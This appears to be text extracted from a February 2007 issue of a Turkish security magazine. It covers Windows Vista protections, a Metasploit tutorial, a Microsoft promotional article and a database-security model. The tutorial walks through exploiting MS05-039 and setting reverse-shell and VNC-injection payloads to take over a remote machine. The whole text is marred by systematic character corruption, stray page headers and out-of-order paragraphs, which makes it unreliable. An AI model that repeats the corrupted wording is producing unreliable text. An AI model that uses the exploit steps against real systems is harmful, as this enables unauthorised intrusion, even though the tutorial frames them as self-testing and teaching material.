802.1X d›fl›nda DHCP, VPN ve IP- SEC seviyesinde derinlemesine güvenlik sa¤layabiliyor. Sald›r›lara karfl› koruman›n son özelli¤i ise Address Space Layout Randomization (Rastgele Adres Yeri Belirleme). Bu özellik sayesinde, Windows Vista yüklenirken DLL ve EXE’ler haf›za içindeki 256 de¤iflik yere konulabiliyor. Bu da zararl› kodun, onlar› bulmas›n› ve kullanmas›n› oldukça güçlefltiriyor. ASLR’nin en önemli özelli¤i, sald›r›lara karfl› iflletim sisteminin yerini haf›za içinde gizlemesi. Windows Vista’n›n sahip oldu¤u güvenlik özelliklerinin son bafll›¤› da Bilgiyi Koruma. Bitlocker teknolojisi, Vista’yla beraber gelen en önemli güvenlik özelliklerinden biri (fiekil-5). Bitlocker sayesinde bütün iflletim sistemi flifrelenebiliyor. Böylece özellikle mobil cihazlar›n kaybolmas› veya çal›nmas› durumunda d›flar›ya bilgi s›zmas› engelleniyor. Windows Vista’n›n Bitlocker taraf›ndan korunan sürücü, baflka bir bilgisayara tak›ld›¤› zaman içindeki hiçbir bilgi okunam›yor. Bu özellik için Trusted Platform Module (TPM) v1.2 kullan›l›yor. fiifreleme için gerekli olan anahtarlar sald›r›lara karfl› dayan›kl› TPM modülü içerisinde saklan›yor. Ayn› zamanda farkl› Bitlocker yap›land›rmalar› (TPM, USB, TPM + fiifre, TPM + USB gibi) ile güvenlik derecesi daha da artt›r›labiliyor. Bitlocker d›fl›nda EFS (Encrypting File System)’deki geliflmeler ise, anahtarlar›n Smart Card’larda fiekil-5 saklanabilmesi ve USB sürücülerinin de flifrelenebilmesi. Son olarak da RMS (Rights Management Services) Client, Vista’n›n içine entegre edilmifl durumda. Bilgi koruman›n en önemli yöntemlerinden biri olan RMS sayesinde dokümanlar ve e-postalar, kullan›c› baz›nda verilen haklara göre korunabiliyor. Böylece istenmeyen e-postalar›n d›flar›ya iletilmesi veya kritik dokümanlarda bilgilerin kopyalanmas› gibi sorunlar ortadan kalk›yor. Windows Vista gelifltirilirken, temel ve ek güvenlik özellikleri sayesinde dünyan›n en güvenilir iflletim sistemi olmaya aday gibi görünüyor. Bugün kurumlar›n ve son kullan›c›lar›n güvenlik bak›m›ndan karfl›laflt›klar› birçok sorunu çözecek olan Windows Vista, art›k son kullan›c›lar için de haz›r durumda. 18 beyazflapka flubat 2007 flubat 2007 beyazflapka 19 Erkan fiEN [email protected] Underground GEÇEN SAYIMIZDA MSF (METASPLOIT FRAMEWORK)’ N KULLANIMINI KOMUTLAR LE ANLATMI TIK. BU SAYIMIZDA DA MSF’ N KULLANIMINI KONSOL VE WEB ARAYÜZÜNÜ KULLANARAK B R ÖRNEK LE AÇIKLAMAYA ÇALI ACA IZ Bunun için öncelikle test yapaca¤›m›z sistem üzerindeki aç›klar›, bir aç›k tarama yaz›l›m› ile kontrol edece¤iz. Ben bunun için Nessus yaz›l›m›n› kulland›m. Kulland›¤›m›z tarama yaz›l›m› ile MSF’in exploit bilgi bankas›ndaki de¤erleri karfl›laflt›rmam›z gerekiyor. Biz testlerimiz s›ras›nda MS05-039 makalesinde bildirilen MS a盤›n› kullanaca¤›z. Yandaki resimde test yapaca¤›m›z sistem üzerinde Nessus’un buldu¤u a盤› görebilirsiniz. fiimdi geçen say›m›zda de¤indi¤imiz komutlar yard›m› ile uzak sistemin yönetimini ele geçirmeye çal›flaca¤›z. ‹lk olarak kullanaca¤›m›z komut sizinde hat›rlayaca¤›n›z gibi MSF konsolumuzu çal›flt›rd›ktan sonra msf > show exploit komutu. Bu komut yard›m› ile ilgili exploit’leri listeleyerek bizim kullanaca¤›m›z exploit’in kullan›m ad›n› bulaca¤›z. Afla¤›daki resimler bu konuda gerekli aç›klamay› verecektir. ‹lgili exploit bulduktan sonra msf > use ms05_039_pnp komutu yard›m› ile Nessus kullanarak buldu¤umuz exploit’i seçiyor ve ayarlar›n› yapmak üzere haz›r hale getiriyoruz. Bu ayarlarda iflletim sistemi, toplu güncellefltirme ve IP adresi gibi bilgilerimizi sisteme vererek kullan›ma haz›r hale getiriyoruz. Bu bilgilerin elimizde olmad›¤› durumlarda genel ayarlar yard›m› ile de ilerleyebiliriz. Ancak sistem bilgileri birçok yaz›l›mla elde edilebilece¤i ve ço¤unlukla tespit etti¤imiz aç›klarda bunu bize belirtti¤i için ince ayarlar› yapmak daha etkin ve kullan›fll› bir yöntemdir. Hedef sistemin iflletim sistemi ve SP bilgilerini biliyorsak bunu belirtiyoruz. E¤er bu bilgileri elde edemediysek genel tan›mlar› kullanabiliriz. msf > show targets komutu yard›m› ile kullanabilece¤imiz seçenekleri görüyoruz ve msf > set TARGET x komutu yard›m› ile seçiyoruz. Son olarak exploit edece¤imiz sistemi nas›l yönetece¤imizi seçiyoruz. Bunun için msf > show payloads komutu ile kullanabilece¤imiz yöntemleri listeletebiliriz. Burada hedef sistemin iflletim sistemi ve ba¤lant› tipi önemli. E¤er hedef sistemin ba¤lant›s› yavafl bir ba¤lant›ysa ve bize komut sat›r› yeterli olacaksa msf > set PAYLOAD win32_reverse komutunu kullanabiliriz. Bu bize hedef sistem üzerinde bir konsol açacak ve istedi¤imiz komutlar› çal›flt›rmam›z› sa¤layacakt›r. Ancak geçen say›m›zda da belirtti¤im gibi sistem üzerinde do¤rudan bir kontrol ifllemi baz› avantajlar da sa¤layabilir. Sistemi VNC kullanarak yönetmek için msf > set PAYLOAD win32_reverse_vncinject komutu kullan›labilir. Burada kullan›lan VNC sunucusu özel olarak derlenmifl ve herhangi bir kay›t defteri de¤eri veya sabit disk kullan›m›na ihtiyaç duymadan haf›zada çal›flan özel bir derlemedir. Tüm bu ayarlar yap›ld›ktan sonra msf > exploit komutunu çal›flt›rarak sistemi yönetmeye bafllayabiliriz. Afla¤›da da ekran görüntüsünü gördü¤ümüz gibi sistemin yönetim ekran› karfl›m›za otomatik olarak aç›lacakt›r. Bundan sonra istedi¤iniz her ifllemi uzaktan yönetti¤iniz sistem üzerinde sa¤layabilirsiniz. Bu say›m›zda geçen say›da teorik olarak anlatt›¤›m›z MSF kullan›m›n› bir örnek ile aç›klamaya çal›flt›k. Son olarak hat›rlatmak isterim ki, MSF kullan›m›na yer vermemizin sebebi sadece kendi sistemlerinizi test etmeniz ve korsanlar›n nas›l çal›flt›¤›n› anlaman›zd›r. Metasploit yaz›l›m›n› kullanarak hedef seçimi ve sisteme s›zma iflleminin ekran görünümü Kullanaca¤›m›z exploit’i seçtikten sonra msf > set RHOST x.x.x.x ve msf > set LHOST x.x.x.x komutlar› yard›m› ile hedef ve kaynak sistemleri belirtiyoruz. 20 beyazflapka flubat 2007 flubat 2007 beyazflapka 21 Göksel TOPBAfi [email protected] Microsoft Güvenlik Stratejisi Uçtan Uca Güvenlik ve Altyap› Yönetim Çözümleri üflterilerinden ve ifl ortaklar›ndan gelen talepler do¤rultusunda, 2002 y›l›ndan bu yana bilgi güvenli¤i konusunda sürekli yat›r›mlarda bulunan Microsoft, güvenli¤e bütünsel bir bak›fl getirerek, kurumlar›n tüm bilgi güvenli¤i ihtiyaçlar›n› karfl›lamay› ve güvenli bir ekosistem oluflturmay› hedeflemektedir. M Microsoft, kifli ve kurulufllar›n dünya çap›ndaki ba¤lant›l› a¤larda, biliflim deneyimlerinin güvenli oldu¤u yönünde bir kuflku duymadan, çok çeflitli cihazlar, ürünler, hizmetler ve organizasyonlar aras›nda çal›flmalar›n› sa¤layan, daha güvenli bir dijital gelecek haz›rlamak istemektedir. Buna paralel olarak Microsoft’un güvenlik vizyonu –kifli ve kurulufllar›n, onlar için önemli olan bilgi, hizmet ve kiflilere daha güvenilir/güvenli bir flekilde ba¤l› olan çeflitli cihazlar› kullanabilecekleri- daha güvenli bir dünya yaratmakt›r. Microsoft daha güvenli bir bilgi ifllem deneyimi sunmak için tüm endüstrinin ortak hareket etmesinin önemini vurgulamaktad›r. Microsoft genifl kitlelere ulaflan ve internet üzerinden eriflilen MSN, Hotmail, Malicious Software Removal Tool gibi ürünlerden elde edilen bilgilere dayanan tecrübe, istihbarat ve bilgi birikimi sayesinde sürekli geliflen tehdit ortam›na sadece daha h›zl› yan›t vermekle kalmay›p, ayn› zamanda gelecekteki trendleri tahmin eden uzun vadeli güvenlik stratejileri gelifltirme yetene¤ine sahiptir. Microsoft, 2002 y›l›ndan beri güvenlik alan›nda yapt›¤› yo¤un çal›flmalarla ç›kard›¤› Windows XP Service Pack 2, Windows Vista, Windows Server 2003 Service Pack 1 ve Windows Server 2003 R2 iflletim sistemlerinde güvenli¤i bafltan ele alm›fl ve güvenlik aç›klar›n› azaltma, daha güvenli ve korunabilen sistemler oluflturma yönünde çok önemli ad›mlar atm›flt›r. Ayl›k güvenlik yamalar› stratejisi, güvenlik yamalar›- n› oluflturmada ve da¤›tmada kulland›¤› yeni teknolojiler ve 2002 y›l›ndan beri ç›kan tüm ürünlerde en önemli önceli¤in güvenlik olmas› ile güvenli biliflimin sa¤lanmas› yönünde sektörde lider bir firmaya yak›flan önderlik ile tüm yaz›l›m firmalar›na örnek olmufltur ve olmaya devam etmek çabas› içerisindedir. Microsoft’un Güvenli Biliflim vizyonunun 4 önemli parças› Güvenlik, Kiflisel Gizlilik, Güvenirlik ve Deneyim’dir. Microsoft, güvenlik biliflim vizyonuyla birlikte güvenlik ürün ve çözümleri alan›nda da çok önemli yat›r›mlar yapm›fl ve birçok alanda k›sa sürede sektörün önemli firmalar› ile ifl ortakl›klar› kurmufltur. Araflt›rma ve gelifltirmesine ay›rd›¤› 100 Milyon Amerikan Dolar› üzerinde bütçe, kaynak ve ortaya koydu¤u inovasyon ile uçtan uca güvenlik ürün ve çözümleri üreten bir yaz›l›m firmas› haline gelmifltir. Microsoft, Forefront Güvenlik ürün ailesi alt›nda toplad›¤› sunucu, istemci ve a¤a eriflim güvenlik çözümleri ile Vista’n›n A¤ Eriflim Protokolü, Internet Explorer 7.0 içerisinde yer alan anti-pishing gibi yeni geliflmifl güvenlik özellikleri, Windows Server 2003 iflletim sistemi içerisinde yer alan ve rüfldünü ispatlam›fl, EAL4+ sertifikas›na sahip Certificate Authority’si ve sertifika yönetiminde yeni bir dönem bafllatacak Certificate LifeCycle Manager isimli yeni ürünü ile Microsoft kurumlara ve kiflilere eksiksiz bir güvenli biliflim ortam› sa¤lamay› hedeflemektedir. Microsoft Dinamik Sistemler Giriflimi çerçevesinde, Microsoft Forefront ürün ailesinin yan›nda sistem yönetim ürünlerini içeren yeni ürün ailesi Microsoft System Center 2007 de, önümüzdeki dönemde pazara ç›kacakt›r. Kendi kendini yöneten, kuran ve operasyonunu sa¤layan sistemleri hedefleyen Microsoft, bu y›l sonunda ç›kmas› beklenen kod ad› Longhorn olan Windows Server 2007 sunucu iflletim sistemi ile bu hedefine çok yaklaflm›fl olacakt›r. Güvenlik ve sistem yönetimi çözümlerinin entegre çal›flarak, kurumlara büyük verimlilik ve eriflilebilirlik art›fllar› getirmesi öngörülmektedir. System Center 2007 ürün ailesi içerisinde istemci ve sunucu sistemlerinin uzaktan yönetimi, yama geçifli, yaz›l›m da¤›t›m› ve envanter yönetimi gibi çok önemli operasyonel ifllevlere yeni boyut kazand›ran System Management Server’›n yeni sürümü Microsoft System Center System Configuration Manager 2007, istemci ve sunucu sistemlerinin ve uygulamalar›n›n proaktif ve reaktif yönetimi, gözlemlenmesi ve hata gideriminde çok büyük faydalar sa¤layan Microsoft’un entegre çözümü, Microsoft Operations Manager’›n yeni sürümü, Microsoft System Center Operations Manager 22 beyazflapka flubat 2007 2007 ürünleri bu y›l içerisinde pazara ç›kacakt›r. Orta ölçekli iflletmelerin istemci ve sunucu sistem iflletimi ve yönetimi için de bu iki ürünün bir arada entegre bir flekilde çal›flan sürümü Microsoft System Center Essentials 2007 ürünü pazara ç›kacakt›r. Kurumsal firmalar›n büyük ihtiyac› olan servis masas› çözümü için Microsoft çal›flmalar›na devam etmektedir ve bu y›l›n sonuna do¤ru Microsoft System Center Service Desk ürününü pazara sunacakt›r. Afla¤›da Microsoft System Center ürün ailesinin yol haritas›n› bulabileceksiniz. Microsoft Forefront güvenlik ürün ailesi içerisinde sunucu, istemci ve a¤ eriflim güvenli¤ini sa¤layan üç ana kategori bulunmaktad›r. E-posta ve birlikte çal›flma ortamlar›n›n güvenli¤ini sa¤lama ve anti-spam özellikleri ile kurumlara gereksiz çok say›da e-posta gelmesini engelleyerek, güvenlik risklerini de ortadan kald›ran Antigen ürünü, Microsoft Forefront ürün ailesi alt›nda Microsoft Forefront Security for Exchange Server ve Microsoft Forefront Security for Sharepoint Server olarak 2006 y›l›n›n son günlerinde pazara sunulmufltur. Özellikle pazara yeni sürülen ve iflletmelere büyük verimlilik ve üretkenlik art›fl› getirmesi beklenen Office System 2007 ürün ailesi içerisinde yer alan Exchange Server 2007 ve Sharepoint Portal Server 2007 ürünleriyle Microsoft, kurumlar›n e-posta ve birlikte çal›flma deneyimlerinde yeni bir dönem bafllat›rken, bu ortamlar›n güvenli¤ini de en bafltan planlam›fl ve bu iki yeni ürünle birlikte güvenlik çözümlerini de ayn› anda pazara ç›karm›flt›r. 25 Eylül 2006’da Gartner, 2006 E-mail Security Boundary Magic Quadrant raporunda Microsoft’u E-posta güvenli¤ini sa¤layan lider firmalar aras›nda göstermifltir. Microsoft’un istemci taraf›ndaki güvenlik ürünü Microsoft Forefront Client Security’nin bu y›l ortas›nda ç›kmas› beklenmektedir. Kas›m ay›nda Beta’s› ç›kan ve etkin bir anti-virus/anti-spyware çözümü olan Forefront Client Security, kurumsal ortamlarda istemci ve sunucu güvenli¤ini en üst seviyeye tafl›may› hedeflemektedir. Microsoft’un en yeni ve ge- (fiekil2) liflmifl entegre internet ve a¤ geçidi çözümü Microsoft ISA Server 2006, geçti¤imiz aylarda piyasaya ç›km›flt›. ISA Server 2006 kurumlar›n bilgi teknolojileri ortamlar›n› internet tabanl› tehditlerden korurken, ayn› zamanda kurum için uygulamalara ve veriye h›zl› ve güvenli eriflimi sa¤lamaktad›r. ‹nternete kurum içi uygulamalar›n güvenli bir flekilde aç›lmas›, uzak ofis geçidi çözümlerinin etkinli¤i, veriminin artt›r›lmas› ve web eriflim korunmas› gibi çok önemli ifllevleri gerçeklefltiren ISA Server 2006, kurumlar›n uçtan uca güvenlik çözümlerinin oluflturulmas›nda etkinli¤i ve kolay kullan›labilirli¤i ile önemli avantajlar sa¤layacakt›r. Microsoft’un güvenlik çözümlerini merkezde Forefront ürün ailesi olacak flekilde afla¤›daki gibi k›saca özetlememiz mümkündür: (fiekil2) Kurumlara içerik ve doküman denetimi ve güvenli¤inde çok önemli avantajlar sunan Windows Rigths Management Services’den de bahsetmemiz uçtan uca güvenlik bak›fl›m›z›n eksik kalmamas› için çok önemli diye düflünüyorum. Windows Server 2003’ün bir servisi olan Rights Management Services ile kurumlar, kurum içi doküman ve e-postalar›n istenmeyen kiflilere yönlendirilmesi, okunmas› ya da yaz›c›dan ç›kt› al›nmas›n› önleyerek, bilginin güvenli¤i ve gizlili¤i etkin bir flekilde sa¤lanabilmektedir. Microsoft kurumsal güvenli¤e bütünsel bir bak›fl getirerek kurumlar›n güvenli¤e bak›fllar›n›n da eksiksiz olmas›n› sa¤lamakta ve genifl ekosisteminin bilgi ve tecrübesi ile kurumlar›n ihtiyac› olan güvenlik ihtiyaçlar› etkin bir flekilde karfl›lamaktad›r. 24-26 Ocak 2007 tarihleri aras›nda Microsoft Güvenlik Zirvesi’nde, Microsoft Forefront güvenlik ürünleri ailesi ve Microsoft System Center 2007 sistem yönetim ürün ailesi hakk›nda teknik sunumlarda çözümlerin detay›, etkinli¤i, müflteri ve ifl ortaklar›m›za aktar›lacakt›r. Microsoft olarak bu çok önemli iki ürün ailesinin yeni ürünlerini 2007 y›l› içerisinde ç›kar›yor olmaktan çok mutluyuz. Bu vesile ile Microsoft olarak 2007 y›l›n›n tüm Beyaz fiapka okurlar›na güvenli, verimli ve çok baflar›l› bir y›l olmas›n› gönülden dileriz. flubat 2007 beyazflapka 23 Hakan ÜNSAL [email protected] ETK‹N B‹R VER‹TABANI GÜVENL‹⁄‹ S‹STEM‹ MODEL‹ Sizde “Sanctum” Var M›? Sanctum: (isim) Özel oda/kutsal yer, kutsal yer, girilmesi yasak, özel. Etimoloji: Geç Ça¤ Latince Telaffuz: 'sa[ng](k)-t&m Büyük kurumlar›m›z›n “data center” ad›n› verdi¤imiz, a¤›rl›kl› olarak web ve veritaban› sistemlerini bulunduran merkezleri, yukar›daki “sanctum” tabirine ne kadar da uyuyor. Adeta göz bebe¤i durumdalar. Tüm ifl zekam›z, flirketlerimizin hassas bilgileri, canl› tüm faaliyetlere temel olan veri bu sanctum’larda duruyor. Bu veri merkezlerinde depolad›¤›m›z ve ço¤u zaman muazzam miktarlara ulaflabilen veriyi iki ana kategori alt›nda s›n›fland›rabiliriz. “Uygulama Verileri” ve “Dosyalar”. Dosyalara örnek olarak sunumlar, PDF’ler, hesap tablolar›, e-postalar, ofis dokümanlar› vs. verilebilir ve bu makalenin d›fl›nda baflka bir yaz›m›zda bunlara özel güvenlik mekanizmalar›ndan bahsetmeyi düflünüyoruz. Öte yandan Uygulama Verisi ad›n› verdi¤imiz k›s›m ise genellikle de¤iflik kurumsal uygulamalar (VTYS, web uygulamalar›, MRP sistemleri, CRM sistemleri vs.) taraf›ndan ifllenip saklan›yor ve kurumlar›n yapt›¤› “ifl”in do¤as›na ba¤l› olarak bu tip veri çok çeflitlilik arz edebiliyor; kredi kart› numaralar›, müflteri ve hesap bilgileri, sat›fl bilgileri/analizleri, finansal bilgiler, stok bilgileri vs. Do¤al olarak, güvenlik sistemleri yöneticileri olarak bu sanctum’larda en yüksek güvenlik seviyesini istiyoruz. Ama ifl birimleri sahip veya yöneticilerinin ise bu noktalara eriflimde kesintiye de hiç tahammülü yok. fiu çeliflki muhakkak size tan›d›k geliyordur: “Çok güvenli olsun ama sak›n kesinti yaflamayal›m, sak›n eriflim yavafllamas›n”. Bu yaz›m›zda art›k bu çeliflkinin gerçek olmad›¤›n›, hem çok h›zl› hem de çok güvenli sanctum’lar yaratman›n hangi teknolojik yaklafl›mlarla mümkün olabilece¤ine dair ipuçlar› vermeye çal›flaca¤›z. Neyi Koruyaca¤›z? Bütün veriler ayn› derecede kritik de¤ildir. Baz›lar› di¤erlerinden daha kritiktir, baz›lar› ise hiç önemli de¤ildir. Bu cümle biraz George Orwell’›n meflhur 1984 roman›n› and›r›yor ama bilgi güvenli¤i aç›s›ndan bakt›¤›m›zda, hassas veriyi tespit edip belirlemek ve bu hassas veriyi tüm muhtemel tehditlerden korumaya yo¤unlaflmam›z gerekti¤i konusunda güzel bir hat›rlat›c›. Genelde 4 tip hassasiyetten bahsedebiliriz: 1. Finansal bilgi, müflteri bilgisi gibi yetkisiz kaynaklar/kifliler taraf›ndan eriflilmemesi gereken gizli bilgi . (Condifentiality) 2. Kredi kart› numaras›, hesap bilgisi gibi yetkisiz eriflimden korunmas› gereken kifliye/kuruma özel bilgi. (Privacy) 3. Menkul k›ymetler borsas› fiyatlar›, döviz paritesi gibi içeri¤inin yetkisiz de¤iflimden korunmas› gereken bilgi. (Integrity) 24 beyazflapka flubat 2007 4. Sistem süreklili¤ini devam ettirmek için korunmas› gereken sistem verileri. (Availability) Bu tür kritik veriye yönelik tehditleri ise iki ana bafll›k alt›nda gruplayabiliriz: Önceliklerin ve/veya yetkilerin ihlali: Kullan›c›lar söz konusu veriye eriflim esnas›nda kendilerine tan›nm›fl olan s›n›rlar›n/yetkilerin ötesine geçmeye çal›flarak bilgiyi de¤ifltirmeye, bozmaya ya da kendilerine sunulandan fazlas›na eriflmeye çal›flabilirler (örne¤in veritaban›ndan tüm müflteri kay›tlar›n› okumaya çal›flan bir DBA ya da web sitesi üzerinden SQL injection ile flifresini bilmedi¤i bir baflka kullan›c›n›n bilgilerine eriflmeye çal›flan bir son kullan›c›). Zafiyetlerin a盤a ç›kart›lmas›, bunlardan faydalanma: Sunulan hizmete eriflimi olan kullan›c›lar›n söz konusu sistem bileflenlerinin birinde ya da birkaç›nda var olan zafiyetlerden, konfigürasyon hatalar›ndan yararlanarak, bunlar› kullanarak, kendilerine tan›nan eriflim haklar›n› daha üst seviyeye ç›kartmalar› ve yetkileri olmayan bilgilere/kaynaklara eriflmeleri. Bu tehditler hem iç hem d›fl risk unsurlar›ndan kaynaklanabilir. Örne¤in müflteriler, ifl ortaklar› ve internet kullan›c›lar› gibi hizmet olarak sundu¤unuz uygulamalara eriflme imkan› olan kullan›c›lar, kendi gelifltirdi¤iniz ya da sat›n ald›¤›n›z uygulama içindeki (veya altyap›s›ndaki) aç›klar› ortaya ç›kartarak uygulaman›z ya da onu destekleyen arka plandaki veritaban›n›z içindeki bilgiye yetkisiz eriflim sa¤layabilirler. Ço¤unlukla güvendi¤iniz ve dolay›s›yla gözünüzün kula¤›n›z›n pek de üzerinde olmad›¤› iç kullan›c›lar da uygulamalar›n›z, onlar› sa¤l›kl› çal›flmas›n› sa¤layan altyap›sal bileflenler ve arka plan›ndaki veritabanlar› üzerinde var olan aç›klardan faydalanma yoluna gitmeyi tercih ederek ayn› flekilde yetkisiz eriflim giriflimlerinde bulunabilir. Yöneticiler (a¤ yöneticileri, sistem yöneticileri, veritaban› yöneticileri), ve uygulama/kod gelifltiriciler, eriflme/de¤ifltirme yetkileri olmayan verilere eriflmek için birçok arka kap›y› çeflitli flekillerde aç›k b›rakabilir. Örne¤in bir okuldaki tüm ö¤retmenlerin s›nav sonuçlar›n› girdi¤i, buna ba¤l› olarak hangi ö¤rencinin sene sonunda hangi baflar› seviyesinde oldu¤unu, s›n›fta kal›p kalmad›¤›n› belirleyen otomatik bir sistemi tasarlayan kifli, verilerin birikti¤i veritaban›nda, kendi gelifltirdi¤i uygulamay› kullanmadan, do¤rudan icra edece¤i basit bir “update” temelli SQL cümleci¤i ile arkas›nda hiç iz/log vs. b›rakmadan kendine yak›n buldu¤u bir ö¤rencinin s›nav notlar›n› illegal bir flekilde yükseltebilir çünkü bu tip kod gelifltiricilerin söz konusu uygulama/veri tabanlar›na hemen hemen her za- man en genifl eriflim mekanizmalar› ile eriflmesine izin verilmifl durumdad›r (çünkü o suyun bafl›ndaki adamd›r ve su kesilirse herkesi rahats›z edip, ortal›¤› aya¤a kald›rmaktad›r). Özetle, sistemlerimizde tan›mlad›¤›m›z kullan›c›lar›n kendilerine tan›nm›fl hassas veriye eriflim, de¤ifltirme ve silme haklar›n›/seviyelerini ihlal etmelerine engel olmaya çal›fl›yoruz. Ve bunun yan› s›ra istisnas›z herkesin sanctum’lar›m›zdaki muhtemel zafiyetlerden faydalanarak hassas bilgilere eriflmesini, de¤ifltirmesini ve yok etmesini engellemeye çal›fl›yoruz. Peki bu hassas bilginin ne oldu¤una ve nerede bulundu¤una nas›l karar verece¤iz? Bu konuya afla¤›da tekrar geri dönece¤iz. Nas›l Koruyaca¤›z? Varsayal›m ki veritabanlar›m›z›n önünde bir bekçi var ve bu veritabanlar›na giren ç›kan tüm verinin en alt seviyede takibini (auditing) yap›yor ve her türlü flüpheli veritaban› hareketinde bizi uyar›yor. Ve yine varsayal›m ki bu bekçi, bizim zararl› olarak tan›mlad›¤›m›z her türlü hareket tan›m›na uyan trafi¤i durduruyor. Üstelik de eriflim h›z›nda hiçbir yavafll›k yaratm›yor. Elbette bu çok güzel olurdu ama büyük sorun flu ki, bu bekçiye neyi nas›l 'audit' edece¤ini çok detayl› bir flekilde ö¤retmemiz gerekir. Neyin uyar› mekanizmalar›n› devreye sokaca¤›n›, neyin ise do¤rudan durdurulmas› gerekti¤ini tek tek belletmemiz gerekecektir bu bekçiye. Üstelik (maalesef), ço¤unlukla bu belletme görevini yapmas›n› bekledi¤imiz kurumumuzdaki güvenlik yöneticisi zaten (hali haz›rda kurumdaki veritabanlar› üzerindeki uygulama detaylar›na sahip olma aç›s›ndan düflünüldü¤ünde) bir nevi kördür. Yani ondan veritaban›ndaki hangi tablo üzerinde hangi kullan›c›n›n update, hangi kullan›c›n›n select yapma hakk› oldu¤unu bilmesini beklememiz ve buna dayanarak bekçiye belletme yapmas›n› beklememiz biraz ütopik olur. Dolay›s›yla, veritabanlar›na eriflim aç›s›ndan düflünüldü¤ünde, çal›flma ortam›n›z› anlamak ve bu ortam içindeki aktiviteyi çok iyi analiz edebilmek, veritabanlar›n›n güvenli¤ini en üst seviyeye çekebilmek aç›s›ndan anahtar unsurdur. si/leri ise daha az önemlidir ve korunmas› için imkan/kaynak harcanmas›na ihtiyaç yoktur?) • Bu bilgiye de¤iflik kaynaklar taraf›ndan nas›l eriflilmektedir? • Ne zaman, hangi IP’den, hangi client-side tool ile, hangi tablolara, hangi operasyonlar ile (select, update, delete)? • Bilgiye eriflilmesini istedi¤iniz yöntemler bu mudur? • Bilgiye eriflimin en güvenli yolu bu mudur? • Her eriflim kayna¤›ndan (source) gelen tehdit (seviyesi/miktar›) nedir? • Hassas bilgilere eriflimi k›s›tlamak için hangi eriflim kontrol mekanizmalar› devreye sokulabilir/sokulmaktad›r? • Veritaban›nda ve destekleyicisi olan altyap›s›nda herhangi bir zafiyet (vulnerability) var m›d›r? • Yanl›fl/eksik konfigüre edilmifl veritabanlar›, • Vendor aç›klar› vs. • Bu zafiyetlerin a盤a ç›kar›lmas›na/kullan›lmas›na engel olabilecek güvenlik kontrolleri nelerdir? Özetle; kapsaml› bir veritaban› güvenli¤i projesinin üç ana bilefleni olmal›d›r ve bu makalenin geri kalan k›s›mlar›nda bu üç ana bileflen etraf›nda flekillenen model hakk›nda detaylara inmeye çal›flaca¤›z: 1. De¤erlendirme - Hassas bilgi nedir ve nerededir? - Normal flartlar dahilinde bu bilgilere nas›l erifliliyor? - ‹hlaller hangi noktada ve nas›l olabilir? 2. Koruma - Kritik bilgiye eriflimin s›n›rlanmas› - Olas› zafiyetlerden faydalan›lmas›n›n engellenmesi 3. Audit - Kritik bilgiye eriflimin takibinin yap›lmas› - Uygun seviye ve miktarda raporlaman›n yap›lmas› fiekil 1: Veritaban› Korumas›n›n Üç Aflamas› ‹flte bu noktada “veritaban› güvenlik de¤erlendirmesi” süreçleri devreye girer. Bu süreçlerin birkaç amac›, baflka bir deyiflle cevaplamaya çal›flt›¤› birkaç soru vard›r: • Hangi bilgi hassast›r ve korunmas› gerekmektedir? (Baflka bir deyiflle hangi bilgi kritiktir ve korunmas› gerekir, hangi- flubat 2007 beyazflapka 25 ETK‹N B‹R VER‹TABANI GÜVENL‹⁄‹ S‹STEM‹ MODEL‹ Sizde “Sanctum” Var M›? Veritaban› Güvenlik De¤erlendirmesi Nedir? T›pk› bir boks antrenörünün yetifltirdi¤i sporcunun as›l maça ç›kmadan önce aç›klar›n› keflfetmek ve kapatmas›n› ö¤renmek/ö¤retmek için üst üste savurdu¤u yumruklar gibi uygulamalar›n›za ve/veya veritabanlar›n›za do¤ru, onlar›n aç›k noktalar›n› bulmak amac›yla üst üste yapt›¤›n›z sald›r›lar m›d›r? Ya da yanl›fl/eksik konfigürasyon unsurlar›n›/kusurlar›n› bulmak için i¤ne ile kuyu kazar gibi tüm veritabanlar›n›z üzerinde ince ince yapt›¤›n›z araflt›rmalar ve gözden geçirmeler midir? Bu iki örne¤i özellikle veriyoruz çünkü ço¤u zaman güvenlik de¤erlendirmeleri (security assessment), zafiyet de¤erlendirmesi (vulnerability assessment) ve aç›k taramas› (vulnerability scanning) ile kar›flt›r›l›yor. Bu son ikisi güvenlik de¤erlendirmesi süreçlerinde faydalan›lan birçok araçtan sadece ikisidir. Baflka bir deyiflle, güvenlik de¤erlendirmesi sadece bu ikisinden daha öte bir fleydir. Gerçek anlamda veri güvenli¤ini elde etmek için sanctum’lar›n›zdaki uygulama verisini iflleyen tüm varl›klar›n›z (web sunucular, uygulama sunucular› ve veritabanlar›) üzerinde de¤erlendirme, koruma ve auditing süreçlerini eksiksiz olarak uygulaman›z gerekmektedir. Bu hedeflere ulaflmak için bir çok yol vard›r. Web ve uygulama sunucular› için güvenli kodlama tekniklerini takip edebilirsiniz, gelifltirdi¤iniz kodun uzman sistemler ya da dan›flmanlar taraf›ndan gözden geçirilmesini sa¤layabilirsiniz, s›zma testleri uygulayabilirsiniz (penetration testleri), yamalar› güncel olarak uygulayabilirsiniz, sunucu s›k›laflt›rmas› prensiplerini s›k› s›k›ya takip edebilirsiniz ve web/XML uygulama firewall’lar› kullanabilirsiniz. Piyasadaki kimi ürünler bu ifllevlerin birden fazlas›n› bünyesinde bulundurmaktad›r. Baz›lar› sadece bir alanda (örne¤in kod analizi) derinlemesine inceleme imkan› sa¤lar (daha önce de belirtti¤imiz gibi uygulama katman›n›n temelini oluflturan web ve uygulama sunucu güvenli¤ini baflka bir makalemizde ele almay› planl›yoruz). Bu yaz›m›zda veritabanlar›n›n güvenli¤ine yönelik konular› paylaflaca¤›z. Web ve uygulama sunucular›nda oldu¤u gibi veritabanlar›n›n da güvenlik de¤erlendirmesi, koruma ve auditing hedefleri için kullan›labilecek bir çok teknik mevcuttur. Bunlar aras›nda veritaban› kullan›m›n›n gözden geçirilmesi, zafiyet taramas›, kesin s›n›rlarla belirlenmifl eriflim kontrolleri, yamalar›n zaman›nda geçilmesi ve testi, sunucu s›k›laflt›rma ifllemleri, sütun ve/veya alan bazl› flifreleme ve audit analizleri say›labilir. Bu noktada, yukar›daki kapsaml› veritaban›/bilgi güvenli¤i projesinin anahtar bileflenleri sorular›na geri dönelim isterseniz. Hassas bilginin hangi bilgiler oldu¤una ve nerede bulundu¤una nas›l karar veririz? Bu noktada birkaç de¤iflik yaklafl›m olabilir: 1. En basiti sormakt›r. ‹fl birimi sahiplerinize, DBA’lerinize vs. bu bilginin ne oldu¤unu ve nerede oldu¤unu sorabilirsiniz. “Sizin için hangi veritabanlar›ndaki hangi bilgiler kritik? 